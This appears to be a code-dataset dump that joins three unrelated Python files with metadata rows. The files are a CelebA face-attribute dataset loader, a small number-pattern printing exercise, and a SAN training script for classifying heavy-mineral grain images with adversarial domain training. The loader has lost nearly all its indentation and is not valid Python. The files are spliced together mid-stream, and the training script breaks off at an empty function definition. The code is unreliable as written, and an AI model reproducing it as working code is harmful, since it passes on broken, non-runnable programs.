self._data_path = os.path.join(self._devkit_path, 'CelebA')
self._classes = ('__background__', # always index 0
'eye', 'nose', 'mouth', 'upper', 'lower', 'face')
self._face_attributes_name = ('5_o_Clock_Shadow', 'Arched_Eyebrows', 'Attractive' ,'Bags_Under_Eyes',
'Bald', 'Bangs', 'Big_Lips', 'Big_Nose',
'Black_Hair', 'Blond_Hair', 'Blurry', 'Brown_Hair',
'Bushy_Eyebrows', 'Chubby', 'Double_Chin', 'Eyeglasses',
'Goatee', 'Gray_Hair', 'Heavy_Makeup', 'High_Cheekbones',
'Male', 'Mouth_Slightly_Open', 'Mustache', 'Narrow_Eyes',
'No_Beard', 'Oval_Face', 'Pale_Skin', 'Pointy_Nose',
'Receding_Hairline', 'Rosy_Cheeks', 'Sideburns', 'Smiling',
'Straight_Hair', 'Wavy_Hair', 'Wearing_Earrings', 'Wearing_Hat',
'Wearing_Lipstick', 'Wearing_Necklace', 'Wearing_Necktie', 'Young' )
self._class_to_ind = dict(zip(self.classes, xrange(self.num_classes)))
self._image_ext = '.jpg'
self._image_index = self._load_image_set_index()
# Default to roidb handler
self._roidb_handler = self.selective_search_roidb
self._salt = str(uuid.uuid4())
self._comp_id = 'comp4'
# PASCAL specific config options
# min_size here means the minimum size of the boxes to keep
# cleanup means whether to clean up the voc results file or not
self.config = {'cleanup' : False,
'use_salt' : True,
'use_diff' : False,
'matlab_eval' : False,
'rpn_file' : None,
'min_size' : 2}
assert os.path.exists(self._devkit_path), \
'CelebAdevkit path does not exist: {}'.format(self._devkit_path)
assert os.path.exists(self._data_path), \
'Path does not exist: {}'.format(self._data_path)
def image_path_at(self, i):
"""
Return the absolute path to image i in the image sequence.
"""
return self.image_path_from_index(self._image_index[i])
def face_attributes_name(self):
return self._face_attributes_name
def image_path_from_index(self, index):
"""
Construct an image path from the image's "index" identifier.
"""
image_path = os.path.join(self._data_path, 'JPEGImages',
index + self._image_ext)
assert os.path.exists(image_path), \
'Path does not exist: {}'.format(image_path)
return image_path
def _load_image_set_index(self):
"""
Load the indexes listed in this dataset's image set file.
"""
# Example path to image set file:
# self._devkit_path + /CelebAdevkit/CelebA/ImageSets/Main/val.txt
image_set_file = os.path.join(self._data_path, 'ImageSets', 'Main',
self._image_set + '.txt')
assert os.path.exists(image_set_file), \
'Path does not exist: {}'.format(image_set_file)
with open(image_set_file) as f:
image_index = [x.strip() for x in f.readlines()]
return image_index
def _get_default_path(self):
"""
Return the default path where PASCAL VOC is expected to be installed.
"""
return os.path.join(cfg.DATA_DIR, 'CelebAdevkit')
def gt_roidb(self):
"""
Return the database of ground-truth regions of interest.
This function loads/saves from/to a cache file to speed up future calls.
"""
cache_file = os.path.join(self.cache_path, self.name + '_gt_roidb.pkl')
if os.path.exists(cache_file):
with open(cache_file, 'rb') as fid:
roidb = cPickle.load(fid)
print '{} gt roidb loaded from {}'.format(self.name, cache_file)
return roidb
gt_roidb = [self.load_celeba_annotation(index)
for index in self.image_index]
with open(cache_file, 'wb') as fid:
cPickle.dump(gt_roidb, fid, cPickle.HIGHEST_PROTOCOL)
print 'wrote gt roidb to {}'.format(cache_file)
return gt_roidb
def selective_search_roidb(self):
"""
Return the database of selective search regions of interest.
Ground-truth ROIs are also included.
This function loads/saves from/to a cache file to speed up future calls.
"""
cache_file = os.path.join(self.cache_path,
self.name + '_selective_search_roidb.pkl')
if os.path.exists(cache_file):
with open(cache_file, 'rb') as fid:
roidb = cPickle.load(fid)
print '{} ss roidb loaded from {}'.format(self.name, cache_file)
return roidb
if self._image_set != 'test':
gt_roidb = self.gt_roidb()
ss_roidb = self._load_selective_search_roidb(gt_roidb)
roidb = imdb.merge_roidbs(gt_roidb, ss_roidb)
else:
roidb = self._load_selective_search_roidb(None)
with open(cache_file, 'wb') as fid:
cPickle.dump(roidb, fid, cPickle.HIGHEST_PROTOCOL)
print 'wrote ss roidb to {}'.format(cache_file)
return roidb
def rpn_roidb(self):
if self._image_set != 'test':
gt_roidb = self.gt_roidb()
rpn_roidb = self._load_rpn_roidb(gt_roidb)
roidb = imdb.merge_roidbs(gt_roidb, rpn_roidb)
else:
roidb = self._load_rpn_roidb(None)
return roidb
def _load_rpn_roidb(self, gt_roidb):
filename = self.config['rpn_file']
print 'loading {}'.format(filename)
assert os.path.exists(filename), \
'rpn data not found at: {}'.format(filename)
with open(filename, 'rb') as f:
box_list = cPickle.load(f)
return self.create_roidb_from_box_list(box_list, gt_roidb)
def _load_selective_search_roidb(self, gt_roidb):
filename = os.path.abspath(os.path.join(cfg.DATA_DIR,
'selective_search_data',
self.name + '.mat'))
assert os.path.exists(filename), \
'Selective search data not found at: {}'.format(filename)
raw_data = sio.loadmat(filename)['boxes'].ravel()
box_list = []
for i in xrange(raw_data.shape[0]):
boxes = raw_data[i][:, (1, 0, 3, 2)] - 1
keep = ds_utils.unique_boxes(boxes)
boxes = boxes[keep, :]
keep = ds_utils.filter_small_boxes(boxes, self.config['min_size'])
boxes = boxes[keep, :]
box_list.append(boxes)
return self.create_roidb_from_box_list(box_list, gt_roidb)
def load_celeba_annotation(self, index):
"""
Load image and bounding boxes info and face attributes info from XML file in the PASCAL VOC
format.
"""
filename = os.path.join(self._data_path, 'Annotations', index + '.xml')
tree = ET.parse(filename)
# load the face attributes info
attributes = tree.findall('attribute')
num_attributes = len(attributes)
face_attrs = np.zeros((num_attributes), dtype=np.int32);
for ix, attribute in enumerate(attributes):
face_attrs[ix] = int(attribute.find('value').text)
# load the boxes info
objs = tree.findall('object')
if not self.config['use_diff']:
# Exclude the samples labeled as difficult
non_diff_objs = [
obj for obj in objs if int(obj.find('difficult').text) == 0]
# if len(non_diff_objs) != len(objs):
# print 'Removed {} difficult objects'.format(
# len(objs) - len(non_diff_objs))
objs = non_diff_objs
num_objs = len(objs)
boxes = np.zeros((num_objs, 4), dtype=np.uint16)
gt_classes = np.zeros((num_objs), dtype=np.int32)
overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)
# "Seg" area for pascal is just the box area
seg_areas = np.zeros((num_objs), dtype=np.float32)
# Load object bounding boxes into a data frame.
for ix, obj in enumerate(objs):
bbox = obj.find('bndbox')
# Make pixel indexes 0-based
x1 = float(bbox.find('xmin').text) - 1
y1 = float(bbox.find('ymin').text) - 1
x2 = float(bbox.find('xmax').text) - 1
y2 = float(bbox.find('ymax').text) - 1
cls = self._class_to_ind[obj.find('name').text.lower().strip()]
boxes[ix, :] = [x1, y1, x2, y2]
gt_classes[ix] = cls
overlaps[ix, cls] = 1.0
seg_areas[ix] = (x2 - x1 + 1) * (y2 - y1 + 1)
overlaps = scipy.sparse.csr_matrix(overlaps)
return {'boxes' : boxes,
'gt_classes': gt_classes,
'gt_overlaps' : overlaps,
'flipped' : False,
'seg_areas' : seg_areas,
'face_attrs': face_attrs}
def _get_comp_id(self):
comp_id = (self._comp_id + '_' + self._salt if self.config['use_salt']
else self._comp_id)
return comp_id
def _get_celeba_results_file_template(self):
# CelebAdevkit/results/CelebA/Main/<comp_id>_det_test_aeroplane.txt
filename = self._get_comp_id() + '_attr_' + self._image_set + '_{:s}.txt'
path = os.path.join(
self._devkit_path,
'results',
'CelebA',
'Main',
filename)
return path
def _write_celeba_results_file(self, all_probs):
for attr_ind, attr in enumerate(self._face_attributes_name):
print 'Writing {} CelabA results file'.format(attr)
filename = self._get_celeba_results_file_template().format(attr)
with open(filename, 'wt') as f:
for im_ind, index in enumerate(self.image_index):
attr_prob = all_probs[im_ind]
f.write('{:s} {:.3f} {:.3f}\n'.
format(index, attr_prob[attr_ind, 0],
attr_prob[attr_ind, 1]))
def _do_python_eval(self, output_dir = 'output'):
annopath = os.path.join(
self._devkit_path,
'CelebA',
'Annotations',
'{:s}.xml')
imagesetfile = os.path.join(
self._devkit_path,
'CelebA',
'ImageSets',
'Main',
self._image_set + '.txt')
cachedir = os.path.join(self._devkit_path, 'annotations_cache')
aps = []
# The PASCAL VOC metric changed in 2010
# use_07_metric = True if int(self._year) < 2010 else False
use_07_metric = True
print 'VOC07 metric? ' + ('Yes' if use_07_metric else 'No')
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
for i, attr in enumerate(self._face_attributes_name):
filename = self._get_celeba_results_file_template().format(attr)
rec, prec, acc = voc_eval(
filename, annopath, imagesetfile, attr, cachedir, ovthresh=0.5,
use_07_metric=use_07_metric)
ap = roc_curve_single_attribute(filename, annopath, imagesetfile, attr, cachedir)
aps += [ap]
print('recall for {} = {:.4f}'.format(attr, rec))
print('precision for {} = {:.4f}'.format(attr, prec))
print('accuracy for {} = {:.4f}'.format(attr, acc))
print('average precision for {} = {:.4f}'.format(attr, ap))
with open(os.path.join(output_dir, attr + '_pr.pkl'), 'w') as f:
cPickle.dump({'rec': rec, 'prec': prec}, f)
print('Mean AP = {:.4f}'.format(np.mean(aps)))
print('~~~~~~~~')
print('Results:')
for ap in aps:
print('{:.3f}'.format(ap))
print('{:.3f}'.format(np.mean(aps)))
print('~~~~~~~~')
print('')
print('--------------------------------------------------------------')
print('Results computed with the **unofficial** Python eval code.')
print('Results should be very close to the official MATLAB eval code.')
print('Recompute with `./tools/reval.py --matlab ...` for your paper.')
print('-- Thanks, The Management')
print('--------------------------------------------------------------')
def _do_matlab_eval(self, output_dir='output'):
print '-----------------------------------------------------'
print 'Computing results with the official MATLAB eval code.'
print '-----------------------------------------------------'
path = os.path.join(cfg.ROOT_DIR, 'lib', 'datasets',
'VOCdevkit-matlab-wrapper')
cmd = 'cd {} && '.format(path)
cmd += '{:s} -nodisplay -nodesktop '.format(cfg.MATLAB)
cmd += '-r "dbstop if error; '
cmd += 'voc_eval(\'{:s}\',\'{:s}\',\'{:s}\',\'{:s}\'); quit;"' \
.format(self._devkit_path, self._get_comp_id(),
self._image_set, output_dir)
print('Running:\n{}'.format(cmd))
status = subprocess.call(cmd, shell=True)
    def dataset_eval(self):
        """Print per-attribute dataset statistics (sample count and positive ratio)
        over the fixed ``trainval`` split.

        NOTE(review): this method calls a module-level function that is *also*
        named ``dataset_eval`` (resolved from globals, not recursion) — confirm
        the shadowing is intentional.
        """
        annopath = os.path.join(
            self._devkit_path,
            'CelebA',
            'Annotations',
            '{:s}.xml')
        imagesetfile = os.path.join(
            self._devkit_path,
            'CelebA',
            'ImageSets',
            'Main',
            'trainval.txt')
        cachedir = os.path.join(self._devkit_path, 'annotations_cache')
        # One positive-ratio slot per attribute; filled below but only printed,
        # never returned.
        ratio_positive_array = np.zeros(len(self._face_attributes_name))
        for i, attr in enumerate(self._face_attributes_name):
            num_images, ratio_positive = dataset_eval(annopath, imagesetfile,
                                                      attr, cachedir)
            ratio_positive_array[i] = ratio_positive
            print('number of samples for {} = {:.4f}'.format(attr, num_images))
            print('positive sample ratio for {} = {:.4f}'.format(attr, ratio_positive))
def evaluate_attributes(self, all_probs, output_dir):
self._write_celeba_results_file(all_probs)
self._do_python_eval(output_dir)
if self.config['matlab_eval']:
self._do_matlab_eval(output_dir)
if self.config['cleanup']:
for attr in self._face_attributes_name:
filename = self._get_celeba_results_file_template().format(attr)
os.remove(filename)
def competition_mode(self, on):
if on:
self.config['use_salt'] = False
self.config['cleanup'] = False
else:
self.config['use_salt'] = True
self.config['cleanup'] = True
if __name__ == '__main__':
    # Manual smoke test: build the trainval imdb, force roidb construction,
    # then drop into an interactive IPython shell for inspection.
    from datasets.celeba import celeba
    d = celeba('trainval')
    res = d.roidb
    from IPython import embed; embed()
| [
"503917315@qq.com"
] | 503917315@qq.com |
e4adfe56054c17345380d384b2475d55646b4b60 | 4921dd11c4cfe45d1d7cfab954c5cfcb4b124972 | /challenges/pattern.py | 67ca75485c13169df216cae7cc43e18eb537600a | [] | no_license | anay-jain/Machine-learning-in-python | 4708c78e876f143777878a3c87d4e26ade09bdf7 | 8b74c360e56130eb3d3a62532451d493f2455eaa | refs/heads/master | 2020-07-10T09:54:36.668861 | 2019-08-30T15:35:43 | 2019-08-30T15:35:43 | 204,235,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | try:
n=int(input())
except:
pass
for x in range(1,n+1):
print(x,end=" ")
print(end="\n")
for i in range(n-1):
for t in range (1,n-i):
print(t, end=" ")
print('* '*(i*2+1) , end=" ")
print(end="\n")
| [
"anayjain98@gmail.com"
] | anayjain98@gmail.com |
693985483ab6c80f3eb110cd22ba40936fa58935 | 7b3bfe08614802ef6b7046601a7c60aba5ed3aac | /Model/train_SAN.py | d02642f63b41e24ca47dbdce06f43c4cdab51a27 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | mapleinmount/SAT_for_image_classification_of_heavy_mineral_grains | 52c2335650397a9ec227398ba48e859cf6f4c4c2 | 081c6ab84cb9719fe71c59ba2c4c58eb3d030072 | refs/heads/main | 2023-07-13T19:28:49.077545 | 2021-08-06T07:31:34 | 2021-08-06T07:31:34 | 393,232,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,385 | py | import os
import random
import time
import cv2
import numpy as np
import logging
import argparse
import shutil
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.parallel
import torch.optim
import torch.utils.data
import torchvision
import torchvision.transforms as transforms
import torch.optim.lr_scheduler as lr_scheduler
import torch.multiprocessing as mp
import torch.distributed as dist
from tensorboardX import SummaryWriter
from util import config
from util.util import AverageMeter, intersectionAndUnionGPU, find_free_port, mixup_data, mixup_loss, smooth_loss, \
cal_accuracy
from SAN import SAN
from util.DomainImageFolder import DomainImageFolder
import random
import ttach as tta
cv2.ocl.setUseOpenCL(False)
cv2.setNumThreads(0)
def get_parser():
    """Parse the command line and return the merged YAML configuration."""
    parser = argparse.ArgumentParser(description='Heavy Minerals Classification')
    parser.add_argument('--config', type=str,
                        default='config/imagenet/imagenet_san10_pairwise.yaml',
                        help='config file')
    parser.add_argument('opts', default=None, nargs=argparse.REMAINDER,
                        help='see config/imagenet/imagenet_san10_pairwise.yaml for all options')
    cli = parser.parse_args()
    assert cli.config is not None
    cfg = config.load_cfg_from_cfg_file(cli.config)
    # Trailing positional key/value pairs override values from the YAML file.
    if cli.opts is not None:
        cfg = config.merge_cfg_from_list(cfg, cli.opts)
    return cfg
def get_logger():
    """Create the process-wide console logger used by the training script.

    Returns a logger named "main-logger" at INFO level with a single
    StreamHandler whose format includes timestamp, level, file/line and pid.
    """
    log = logging.getLogger("main-logger")
    log.setLevel(logging.INFO)
    fmt = "[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s"
    console = logging.StreamHandler()
    console.setFormatter(logging.Formatter(fmt))
    log.addHandler(console)
    return log
def worker_init_fn(worker_id):
    # DataLoader worker seeding: offset the base seed by the worker id so each
    # worker draws a distinct but reproducible random stream.
    # NOTE(review): relies on the module-level `args` assigned in main_worker().
    random.seed(args.manual_seed + worker_id)
def main_process():
    """Return True when this process should log/save.

    That is the sole process in non-distributed runs, or the process whose
    global rank is a multiple of the per-node GPU count otherwise.
    """
    if not args.multiprocessing_distributed:
        return True
    return args.rank % args.ngpus_per_node == 0
def main():
    """Entry point: parse config, seed RNGs, and launch the worker process(es).

    In multiprocessing-distributed mode one worker is spawned per GPU on this
    node; otherwise main_worker() is called directly in this process.
    """
    args = get_parser()
    os.environ["CUDA_VISIBLE_DEVICES"] = ','.join(str(x) for x in args.train_gpu)
    if args.manual_seed is not None:
        random.seed(args.manual_seed)
        np.random.seed(args.manual_seed)
        # BUG FIX: the three torch seeding calls used args.manualSeed
        # (camelCase), an attribute that is never defined anywhere -- the
        # config key is manual_seed -- so enabling seeding raised
        # AttributeError and torch was never actually seeded.
        torch.manual_seed(args.manual_seed)
        torch.cuda.manual_seed(args.manual_seed)
        torch.cuda.manual_seed_all(args.manual_seed)
        # Trade cudnn autotuning for run-to-run determinism.
        cudnn.benchmark = False
        cudnn.deterministic = True
    if args.dist_url == "env://" and args.world_size == -1:
        args.world_size = int(os.environ["WORLD_SIZE"])
    args.distributed = args.world_size > 1 or args.multiprocessing_distributed
    args.ngpus_per_node = len(args.train_gpu)
    # A single GPU needs neither sync-BN nor a process group.
    if len(args.train_gpu) == 1:
        args.sync_bn = False
        args.distributed = False
        args.multiprocessing_distributed = False
    if args.multiprocessing_distributed:
        port = find_free_port()
        args.dist_url = f"tcp://127.0.0.1:{port}"
        args.world_size = args.ngpus_per_node * args.world_size
        # mp.spawn prepends the process index as the first argument (gpu).
        mp.spawn(main_worker, nprocs=args.ngpus_per_node, args=(args.ngpus_per_node, args))
    else:
        main_worker(args.train_gpu, args.ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, argss):
    """Per-process training worker.

    Sets up the (optionally distributed) SAN model, its optimizers/scheduler,
    the domain-labelled data loaders, then runs the epoch loop of
    train()/validate() with checkpointing of the best top-1 model.

    :param gpu: local GPU index in distributed mode (the train_gpu list otherwise)
    :param ngpus_per_node: number of GPUs on this node
    :param argss: merged config from get_parser()
    """
    global args, best_acc1
    args, best_acc1 = argss, 0
    if args.distributed:
        # Derive this process's global rank and join the process group.
        if args.dist_url == "env://" and args.rank == -1:
            args.rank = int(os.environ["RANK"])
        if args.multiprocessing_distributed:
            args.rank = args.rank * ngpus_per_node + gpu
        dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url, world_size=args.world_size,
                                rank=args.rank)
    # model = torchvision.models.resnet18(pretrained=False, progress=True, num_classes=args.classes)
    model = SAN()
    criterion = nn.CrossEntropyLoss(ignore_index=args.ignore_label)
    # `optimizer` updates all trainable parameters; `optimizer1` updates only
    # the domain discriminator (the adversarial branch trained in train()).
    optimizer = torch.optim.SGD(filter(lambda p: p.requires_grad, model.parameters()), lr=args.base_lr, momentum=args.momentum,
                                weight_decay=args.weight_decay)
    optimizer1 = torch.optim.SGD(model.discriminator.parameters(), lr=args.base_lr, momentum=args.momentum,weight_decay=args.weight_decay)
    # optimizer = torch.optim.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=args.base_lr)
    if args.scheduler == 'step':
        scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=args.step_epochs, gamma=0.1)
    elif args.scheduler == 'cosine':
        scheduler = lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)
    if main_process():
        # Only the main process logs and writes TensorBoard summaries.
        global logger, writer
        logger = get_logger()
        writer = SummaryWriter(args.save_path)
        # logger.info(args)
        logger.info("=> creating model ...")
        logger.info("Classes: {}".format(args.classes))
        # logger.info(model)
    if args.distributed:
        torch.cuda.set_device(gpu)
        # Split the configured global batch size / worker count across GPUs.
        args.batch_size = int(args.batch_size / ngpus_per_node)
        args.batch_size_val = int(args.batch_size_val / ngpus_per_node)
        args.workers = int((args.workers + ngpus_per_node - 1) / ngpus_per_node)
        model = torch.nn.parallel.DistributedDataParallel(model.cuda(), device_ids=[gpu])
    else:
        model = torch.nn.DataParallel(model.cuda())
    # NOTE(review): hard-coded warm-start checkpoint, loaded unconditionally
    # *before* the optional --weight/--resume handling below -- confirm this
    # stage-2 initialization is intended for every run.
    pth = torch.load("/deepo_data/GSP/heavy_minerals/output/CY/stage2/model_best.pth")
    model.load_state_dict(pth['state_dict'])
    if args.weight:
        # Optional weight-only initialization (no optimizer/epoch state).
        if os.path.isfile(args.weight):
            if main_process():
                logger.info("=> loading weight '{}'".format(args.weight))
            checkpoint = torch.load(args.weight)
            model.load_state_dict(checkpoint['state_dict'])
            if main_process():
                logger.info("=> loaded weight '{}'".format(args.weight))
        else:
            if main_process():
                logger.info("=> no weight found at '{}'".format(args.weight))
    if args.resume:
        # Full resume: restores model, optimizer, scheduler and epoch counter.
        if os.path.isfile(args.resume):
            if main_process():
                logger.info("=> loading checkpoint '{}'".format(args.resume))
            checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage.cuda(gpu))
            args.start_epoch = checkpoint['epoch']
            best_acc1 = checkpoint['top1_val']
            model.load_state_dict(checkpoint['state_dict'])
            optimizer.load_state_dict(checkpoint['optimizer'])
            scheduler.load_state_dict(checkpoint['scheduler'])
            if main_process():
                logger.info("=> loaded checkpoint '{}' (epoch {})".format(args.resume, checkpoint['epoch']))
        else:
            if main_process():
                logger.info("=> no checkpoint found at '{}'".format(args.resume))
    # Per-domain normalization statistics (domain 1 / domain 2).
    mean1, std1 = [0.385, 0.372, 0.36], [0.213, 0.215, 0.225]
    mean2, std2 = [0.294, 0.353, 0.37], [0.192, 0.209, 0.227]
    train_domain_folders = [ "/deepo_data/GSP/heavy_minerals/data/Yangtze/train",
                            "/deepo_data/GSP/heavy_minerals/data/YarlungZangbo/train",]
    #                         "/deepo_data/GSP/heavy_minerals/data/PumQu/all"]
    # val_domain_folders = ["/deepo_data/GSP/heavy_minerals/data/Yangtze/val",
    #                       "/deepo_data/GSP/heavy_minerals/data/YarlungZangbo/val",
    #                       "/deepo_data/GSP/heavy_minerals/data/PumQu/val"]
    val_domain_folders = ["/deepo_data/GSP/heavy_minerals/data/PengQu/val"]
    # Training augmentation: rotation + center crop + random erasing.
    transform1 = transforms.Compose(
        [transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)),
         transforms.ToTensor(), transforms.Normalize(mean1, std1), torchvision.transforms.RandomErasing(p=0.3)])
    transform2 = transforms.Compose(
        [transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)),
         transforms.ToTensor(), transforms.Normalize(mean2, std2), torchvision.transforms.RandomErasing(p=0.3)])
    # NOTE(review): validation transforms also apply RandomRotation, making
    # validation stochastic -- confirm this is intended.
    val_transform1 = transforms.Compose(
        [transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)), transforms.ToTensor(), transforms.Normalize(mean1, std1)])
    val_transform2 = transforms.Compose(
        [transforms.Resize((256, 256)), transforms.RandomRotation(30), transforms.CenterCrop((224, 224)),transforms.ToTensor(), transforms.Normalize(mean2, std2)])
    train_set = DomainImageFolder(train_domain_folders, transform1=transform1, transform2=transform2)
    val_set = DomainImageFolder(val_domain_folders, transform1=val_transform1, transform2=val_transform2)
    if args.distributed:
        train_sampler = torch.utils.data.distributed.DistributedSampler(train_set)
        val_sampler = torch.utils.data.distributed.DistributedSampler(val_set)
    else:
        train_sampler = None
        val_sampler = None
    train_loader = torch.utils.data.DataLoader(train_set, batch_size=args.batch_size, shuffle=(train_sampler is None),
                                               num_workers=args.workers, pin_memory=True, sampler=train_sampler)
    val_loader = torch.utils.data.DataLoader(val_set, batch_size=args.batch_size_val, shuffle=False,
                                             num_workers=args.workers, pin_memory=True, sampler=val_sampler)
    for epoch in range(args.start_epoch, args.epochs):
        if args.distributed:
            # Reshuffle the distributed sampler each epoch.
            train_sampler.set_epoch(epoch)
        loss_train, mIoU_train, mAcc_train, allAcc_train, top1_train, top5_train = train(train_loader, model, criterion,
                                                                                        optimizer, optimizer1, epoch)
        loss_val, mIoU_val, mAcc_val, allAcc_val, top1_val, top5_val = validate(val_loader, model, criterion)
        scheduler.step()
        epoch_log = epoch + 1
        if main_process():
            writer.add_scalar('loss_train', loss_train, epoch_log)
            writer.add_scalar('mIoU_train', mIoU_train, epoch_log)
            writer.add_scalar('mAcc_train', mAcc_train, epoch_log)
            writer.add_scalar('allAcc_train', allAcc_train, epoch_log)
            writer.add_scalar('top1_train', top1_train, epoch_log)
            writer.add_scalar('top5_train', top5_train, epoch_log)
            writer.add_scalar('loss_val', loss_val, epoch_log)
            writer.add_scalar('mIoU_val', mIoU_val, epoch_log)
            writer.add_scalar('mAcc_val', mAcc_val, epoch_log)
            writer.add_scalar('allAcc_val', allAcc_val, epoch_log)
            writer.add_scalar('top1_val', top1_val, epoch_log)
            writer.add_scalar('top5_val', top5_val, epoch_log)
        if (epoch_log % args.save_freq == 0) and main_process():
            # Periodic checkpoint; best top-1 model is copied aside, and only
            # the two most recent periodic checkpoints are kept on disk.
            filename = args.save_path + '/train_epoch_' + str(epoch_log) + '.pth'
            logger.info('Saving checkpoint to: ' + filename)
            torch.save({'epoch': epoch_log, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(),
                        'scheduler': scheduler.state_dict(), 'top1_val': top1_val, 'top5_val': top5_val}, filename)
            if top1_val > best_acc1:
                best_acc1 = top1_val
                shutil.copyfile(filename, args.save_path + '/model_best.pth')
            if epoch_log / args.save_freq > 2:
                deletename = args.save_path + '/train_epoch_' + str(epoch_log - args.save_freq * 2) + '.pth'
                os.remove(deletename)
def train(train_loader, model, criterion, optimizer, optimizer1, epoch):
    """Train for one epoch with an adversarial domain-discriminator step.

    Per batch: optimize classification (+ domain) loss with `optimizer`, then
    take 5 discriminator-only steps with `optimizer1` on a negated, scaled
    domain loss (adversarial training).

    :returns: (avg loss, mIoU, mAcc, allAcc, avg top1, avg top5)
    """
    batch_time = AverageMeter()
    data_time = AverageMeter()
    loss_meter = AverageMeter()
    intersection_meter = AverageMeter()
    union_meter = AverageMeter()
    target_meter = AverageMeter()
    top1_meter = AverageMeter()
    top5_meter = AverageMeter()
    criterion1 = nn.CrossEntropyLoss()
    model.train()
    end = time.time()
    max_iter = args.epochs * len(train_loader)
    for i, (input, target, domain) in enumerate(train_loader):
        data_time.update(time.time() - end)
        input = input.cuda(non_blocking=True)
        target = target.cuda(non_blocking=True)
        domain = domain.cuda(non_blocking=True)
        if args.mixup_alpha:
            eps = args.label_smoothing if args.label_smoothing else 0.0
            input, target_a, target_b, lam = mixup_data(input, target, args.mixup_alpha)
            input, domain_a, domain_b, lam = mixup_data(input, domain, args.mixup_alpha)
            output, output_domain = model(input)
            loss = mixup_loss(output, target_a, target_b, lam, eps)
        else:
            output, output_domain = model(input)
            if args.label_smoothing:
                # loss = smooth_loss(output, target, args.label_smoothing)
                loss = smooth_loss(output, target, args.label_smoothing) + criterion1(output_domain, domain).mean()
                # loss = criterion1(output_domain, domain)
            else:
                # loss = criterion(output, target).mean()
                loss = criterion(output, target) + criterion1(output_domain, domain)
                # loss = criterion1(output_domain, domain)
        # loss2 = -criterion1(output_domain, domain)
        optimizer.zero_grad()
        loss.backward() #retain_graph=True
        optimizer1.zero_grad()
        # BUG FIX: this inner loop used `for i in range(5)`, shadowing the
        # outer batch index `i`. After the loop, i was always 4, which broke
        # current_iter, the remaining-time estimate, the print-frequency test
        # and the per-batch TensorBoard step below. Use a throwaway name.
        # NOTE(review): zero_grad() is intentionally(?) called only once before
        # the 5 steps, so discriminator gradients accumulate across them --
        # confirm this is the intended adversarial schedule.
        for _ in range(5):
            output, output_domain = model(input)
            loss2 = - 0.3 * criterion1(output_domain, domain).mean()
            loss2.backward()
            optimizer1.step()
        optimizer.step()
        top1, top5 = cal_accuracy(output, target, topk=(1, 5))
        n = input.size(0)
        if args.multiprocessing_distributed:
            # Average loss/accuracy across all processes, weighted by batch size.
            with torch.no_grad():
                loss, top1, top5 = loss.detach() * n, top1 * n, top5 * n
                count = target.new_tensor([n], dtype=torch.long)
                dist.all_reduce(loss), dist.all_reduce(top1), dist.all_reduce(top5), dist.all_reduce(count)
                n = count.item()
                loss, top1, top5 = loss / n, top1 / n, top5 / n
        loss_meter.update(loss.item(), n), top1_meter.update(top1.item(), n), top5_meter.update(top5.item(), n)
        output = output.max(1)[1]
        intersection, union, target = intersectionAndUnionGPU(output, target, args.classes, args.ignore_label)
        if args.multiprocessing_distributed:
            dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)
        intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()
        intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)
        accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)
        batch_time.update(time.time() - end)
        end = time.time()
        # calculate remain time
        current_iter = epoch * len(train_loader) + i + 1
        remain_iter = max_iter - current_iter
        remain_time = remain_iter * batch_time.avg
        t_m, t_s = divmod(remain_time, 60)
        t_h, t_m = divmod(t_m, 60)
        remain_time = '{:02d}:{:02d}:{:02d}'.format(int(t_h), int(t_m), int(t_s))
        if ((i + 1) % args.print_freq == 0) and main_process():
            logger.info('Epoch: [{}/{}][{}/{}] '
                        'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
                        'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '
                        'Remain {remain_time} '
                        'Loss {loss_meter.val:.4f} '
                        'Accuracy {accuracy:.4f} '
                        'Acc@1 {top1.val:.3f} ({top1.avg:.3f}) '
                        'Acc@5 {top5.val:.3f} ({top5.avg:.3f}).'.format(epoch + 1, args.epochs, i + 1,
                                                                        len(train_loader),
                                                                        data_time=data_time,
                                                                        batch_time=batch_time,
                                                                        remain_time=remain_time,
                                                                        loss_meter=loss_meter,
                                                                        accuracy=accuracy,
                                                                        top1=top1_meter,
                                                                        top5=top5_meter))
        if main_process():
            writer.add_scalar('loss_train_batch', loss_meter.val, current_iter)
            writer.add_scalar('mIoU_train_batch', np.mean(intersection / (union + 1e-10)), current_iter)
            writer.add_scalar('mAcc_train_batch', np.mean(intersection / (target + 1e-10)), current_iter)
            writer.add_scalar('allAcc_train_batch', accuracy, current_iter)
            writer.add_scalar('top1_train_batch', top1, current_iter)
            writer.add_scalar('top5_train_batch', top5, current_iter)
    iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)
    accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)
    mIoU = np.mean(iou_class)
    mAcc = np.mean(accuracy_class)
    allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)
    if main_process():
        logger.info(
            'Train result at epoch [{}/{}]: mIoU/mAcc/allAcc/top1/top5 {:.4f}/{:.4f}/{:.4f}/{:.4f}/{:.4f}.'.format(
                epoch + 1, args.epochs, mIoU, mAcc, allAcc, top1_meter.avg, top5_meter.avg))
    return loss_meter.avg, mIoU, mAcc, allAcc, top1_meter.avg, top5_meter.avg
def validate(val_loader, model, criterion):
